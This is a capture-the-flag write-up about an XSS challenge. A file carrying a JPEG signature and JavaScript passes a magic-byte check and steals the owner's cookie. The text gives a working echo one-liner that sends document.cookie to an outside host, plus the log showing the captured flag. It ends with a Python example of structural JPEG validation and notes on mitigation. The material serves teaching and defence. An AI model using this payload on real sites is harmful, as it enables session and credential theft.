This is a web challenge. There is an XSS flaw in the website, and the goal is to steal the cookie of the website owner because it contains the flag. The owner visits the site every time a new picture is uploaded :)
On the website we are able to upload a picture and choose whether it will be embedded with an <img> tag or a <script> tag by changing the value of the "tag" POST variable.
The website validates that the uploaded file really is an image (it inspects the file's bytes to make sure the upload is not a script or something similar).
So what we need to do is bypass the server-side image check and still have the file interpreted as a script.
Very cool, so with this I have created the following payload:
echo -en "\xff\xd8\xff\xf8=1;img=new Image();img.src='http://www.gilgalab.com.br/?cookie='+document.cookie;" > xpto2.jpg
After that all I had to do was to upload the image and set the “tag” field to “script” and check the apache logs!
22.214.171.124 - - [09/Jun/2013:00:43:27 +0000] "GET /?cookie=flag=didnt_need_script_tags_on_ie6 HTTP/1.1" 200 2476 "http://localhost/gallery/63330c986a4daffe2c4cec548945de1b5ee456c2/upload.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"
So the flag is flag=didnt_need_script_tags_on_ie6
Nice challenge :)
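The check the server performed only looked at the leading signature bytes, which is why a file that starts with the JPEG SOI marker and continues with JavaScript passes. The following is an added example, not code from the challenge or the writeup, showing in Python that a signature-only check accepts the crafted upload from the post while a walk over the JPEG segment structure rejects it because the bytes after the marker do not form a valid segment. The MINIMAL_JPEG skeleton and the function names are constructed for this example.

```python
"""Added example (not from the writeup): a magic-byte check is not an image check."""
import struct
from typing import Tuple

# Constructed from the payload shown in the writeup: the JPEG SOI marker bytes
# followed by JavaScript. Only the first three bytes look like a JPEG.
CRAFTED_UPLOAD = b"\xff\xd8\xff\xf8=1;img=new Image();"

# Constructed: a structurally well-formed JPEG skeleton (SOI, APP0/JFIF, EOI).
# It carries no scan data, so it would not decode to pixels, but every segment
# has a correct marker and length, which is what the structural walk verifies.
MINIMAL_JPEG = (
    b"\xff\xd8"                                   # SOI
    + b"\xff\xe0" + struct.pack(">H", 16)         # APP0, length 16 (includes itself)
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xd9"                                 # EOI
)

# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE_MARKERS = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def weak_is_jpeg(data: bytes) -> bool:
    """The kind of check the challenge server did: signature bytes only."""
    return data[:3] == b"\xff\xd8\xff"


def strict_jpeg_segments(data: bytes) -> Tuple[bool, str]:
    """Walk the marker segments and report the first structural violation.

    Every segment after SOI must start with 0xFF, a marker byte, and (for
    non-standalone markers) a big-endian length that fits inside the file.
    Returns (ok, reason).
    """
    if data[:2] != b"\xff\xd8":
        return False, "missing SOI"
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            return False, "expected marker at offset %d, got 0x%02x" % (pos, data[pos])
        if pos + 1 >= len(data):
            return False, "truncated marker"
        marker = data[pos + 1]
        if marker == 0xD9:
            return True, "well-formed"
        if marker in STANDALONE_MARKERS:
            pos += 2
            continue
        if pos + 4 > len(data):
            return False, "marker 0x%02x has no length field" % marker
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):
            return False, "segment 0x%02x length %d overruns file" % (marker, length)
        if marker == 0xDA:
            # Start of Scan: entropy-coded data follows until the EOI marker.
            if data.find(b"\xff\xd9", pos + 2 + length) == -1:
                return False, "scan data without EOI"
            return True, "well-formed"
        pos += 2 + length
    return False, "no EOI marker"


if __name__ == "__main__":
    for name, blob in (("crafted upload", CRAFTED_UPLOAD), ("minimal jpeg", MINIMAL_JPEG)):
        print(name, "weak:", weak_is_jpeg(blob), "strict:", strict_jpeg_segments(blob))
```

On the crafted upload the fourth byte 0xF8 is read as a marker whose length field is the two ASCII bytes "=1" (0x3D31, 15665), which overruns the 23-byte file, so the structural walk rejects it. A segment walk is still only a sanity check; the robust server-side fix is to fully decode the upload with an image library and re-encode it, so that nothing but pixel data survives, and to serve uploads with the correct image Content-Type plus X-Content-Type-Options: nosniff so a browser will not execute the response as script even if it is referenced from a <script> tag.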